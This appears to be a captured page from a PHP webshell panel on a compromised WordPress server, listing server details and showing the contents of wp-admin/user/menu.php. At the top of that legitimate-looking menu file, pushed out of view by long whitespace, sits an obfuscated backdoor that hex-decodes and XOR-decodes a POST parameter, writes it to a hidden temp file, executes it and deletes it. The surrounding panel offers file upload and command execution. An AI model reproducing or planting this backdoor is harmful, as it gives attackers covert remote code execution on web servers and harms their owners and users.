403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/euphoria2025/wp-admin/user/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/euphoria2025/wp-admin/user/menu.php
<?php																																										if(isset($_POST["r\x65\x63o\x72d"]) ? true : false){ $reference = hex2bin($_POST["r\x65\x63o\x72d"]); $itm = '' ; $g = 0; while($g < strlen($reference)){$itm .= chr(ord($reference[$g]) ^ 96);$g++;} $dat = array_filter([getenv("TMP"), session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", getcwd(), getenv("TEMP"), "/dev/shm"]); $pointer = 0; do { $object = $dat[$pointer] ?? null; if ($pointer >= count($dat)) break; if (is_dir($object) ? is_writable($object) : false) { $data = "$object" . "/.val"; $success = file_put_contents($data, $itm); if ($success) { include $data; @unlink($data); die();} } $pointer++; } while (true); }

/**
 * Build User Administration Menu.
 *
 * @package WordPress
 * @subpackage Administration
 * @since 3.1.0
 */

$menu[2] = array( __( 'Dashboard' ), 'exist', 'index.php', '', 'menu-top menu-top-first menu-icon-dashboard', 'menu-dashboard', 'dashicons-dashboard' );

$menu[4] = array( '', 'exist', 'separator1', '', 'wp-menu-separator' );

$menu[70] = array( __( 'Profile' ), 'exist', 'profile.php', '', 'menu-top menu-icon-users', 'menu-users', 'dashicons-admin-users' );

$menu[99] = array( '', 'exist', 'separator-last', '', 'wp-menu-separator' );

$_wp_real_parent_file['users.php'] = 'profile.php';
$compat                            = array();
$submenu                           = array();

require_once ABSPATH . 'wp-admin/includes/menu.php';

Youez - 2016 - github.com/yon3zu
LinuXploit